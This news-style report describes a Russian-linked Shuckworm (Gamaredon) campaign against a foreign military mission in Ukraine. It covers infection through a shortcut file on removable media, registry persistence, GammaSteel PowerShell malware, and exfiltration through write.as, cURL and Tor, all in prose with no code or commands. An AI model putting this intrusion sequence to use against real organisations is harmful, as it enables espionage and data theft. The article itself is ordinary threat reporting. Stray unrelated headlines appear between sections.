A Decade of Digital Espionage
A Russian-backed hacking group called Shuckworm has launched a new cyberattack. This time, they targeted a foreign military mission in Ukraine. Shuckworm is also known as Gamaredon or Armageddon. The group has been active since 2013. They mostly attack Ukrainian government offices, defense systems, and law enforcement agencies. Experts say Shuckworm works for the Russian Federal Security Service (FSB). Their cyberattacks have continued during the Russia-Ukraine war. This latest attack shows they are still very active and dangerous.
The latest campaign was discovered by cybersecurity experts at Symantec, who reported that the attack began on February 26 and extended into March. What makes this campaign stand out is its target—a Western military mission on Ukrainian soil—indicating a bold step in Shuckworm’s espionage goals.
Shuckworm used a new version of its malware called GammaSteel in this attack. GammaSteel is made to steal data without being seen. It was written in PowerShell, a tool used in Windows systems. This let the hackers sneak into computers, look for important files, and send the stolen data back to their own servers. They did all this while avoiding most security programs.
How the Attack Unfolded
The attack began in a simple yet deceptive way. Shuckworm used an infected removable drive containing a file labeled “D:\files.lnk.” When this shortcut file was opened, it triggered a process that altered the Windows Registry, enabling the malware to automatically run every time the computer was restarted. This gave the hackers a way in.
From there, they ran a file named mishta.exe to bypass standard security checks. They followed this up with a series of hidden commands using a built-in Windows tool called wscript.exe. These commands allowed them to connect the infected computer to their Command and Control server, which acts as a headquarters for the hackers, allowing them to issue more commands and retrieve stolen data.
Critical Vulnerabilities: The Dark Side of Pacemaker Technology
After gaining access, Shuckworm expanded its reach. It methodically moved through the computer system, infecting all connected USB drives and shared network folders. This made sure the malware spread beyond a single device and into other parts of the organization’s infrastructure.
On March 1, the hackers were observed carrying out a wave of activity on the compromised server. They launched tools to gather information about the system and created two new backup servers to maintain control in case their primary access point was blocked. These moves show how organized and persistent Shuckworm is in its operations.
Military Documents and Methods of Theft
What the hackers wanted became clear soon. Security experts found a group of stolen files. The file names showed they were linked to military plans and battlefield actions. Some files had titles about inspection steps, air defense orders, and troop movements. Others mentioned wound reports and casualty details. The exact content is not confirmed. But the names suggest the hackers were after secret military information.
Once they had the files, the group found ways to smuggle the data out. They used a public website called write.as to upload the stolen files. As a backup, they used cURL, a tool that moves data online. They also used Tor, a network that hides who you are and where you’re from. These tools helped them stay hidden and avoid being tracked.
How Cyber Attacks on Industrial Control Systems Can Endanger Lives ?
According to the security researchers, this campaign showed that Shuckworm has become more skilled. They relied more heavily on PowerShell tools, made minor but effective changes to their malware code, and used legitimate-looking services to avoid drawing attention. This made the entire attack chain more complicated and harder to detect, signaling an increase in the group’s capabilities.
This latest hacking operation is a reminder of the ongoing cyber war tied to the physical conflict in Ukraine. While soldiers fight on the ground, digital attackers like Shuckworm operate in the shadows, stealing secrets and undermining operations with a few lines of code.
